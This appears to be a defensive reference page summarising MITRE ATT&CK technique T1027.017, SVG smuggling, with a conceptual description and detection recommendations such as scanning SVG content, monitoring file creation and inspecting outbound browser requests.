MITRE

MITRE Technique [T1027.017] Obfuscated Files or Information: SVG Smuggling

MITRE

[T1027.017 ] Obfuscated Files or Information: SVG Smuggling – SVG smuggling hides malicious JavaScript or payloads inside seemingly harmless SVG image files to bypass content filters and fool users, enabling delivery of malware, credential theft, or redirects to malicious sites. #SVGSmuggling #DefenseEvasion

Keypoints

  • SVG files are XML-based images that can include embedded scripts, enabling attackers to hide active payloads in image files.
  • Attackers use SVGs to assemble or decode payloads in the victim browser, evading traditional attachment and content filters.
  • SVG smuggling can download additional malware or perform redirects without triggering usual file-type protections.
  • SVGs can host interactive elements like fake login forms or malicious buttons to capture credentials or trick users.
  • Detection requires inspecting file contents, monitoring browser script activity, and logging file creation and network requests.

Description:

  • Like a Trojan horse painted as a harmless picture, SVG smuggling hides active threats inside image files so they pass security checks and trick users into letting the threat inside.
  • Adversaries embed JavaScript or encoded data in SVG XML to assemble, download, or run malicious payloads in the browser or in documents; this enables stealthy delivery and execution of malware, credential theft, and redirects, and matters because image files are often trusted and bypass simple filters.

Detection:

  • Scan SVG file contents for , onload, or suspicious embedded data URIs using static parsers like OSS tools or custom YARA rules.
  • Monitor file creation logs and file system events for unexpected SVG writes in user directories with EDR tools; correlate with process parents for browser or document readers.
  • Inspect outbound HTTP/HTTPS requests from browsers and document viewers for suspicious downloads or exfiltration immediately after an SVG is opened.
  • Enable and review browser engine and JavaScript console logs in enterprise telemetry to catch runtime script execution originating from SVGs.
  • Use MIME-type and content-type validation on email gateways and web proxies to block SVGs with executable content or inline scripts; add policy to strip or quarantine such files.
  • Watch for signs of HTML/ SVG smuggling chains by scanning embedded resources in emails, PDFs, and HTML for base64 blobs or long encoded strings that decode into scripts.
  • Reduce false positives by whitelisting known benign SVG sources and using heuristic thresholds for script complexity and external callbacks; validate detections with sandbox execution (browser-headless) to confirm malicious behavior.

Tactics:
Defense Evasion

Platforms:
Linux, Windows, macOS

Data Sources:
File: File Creation

Relationship Citations:
,

Read More: https://attack.mitre.org/techniques/T1027/017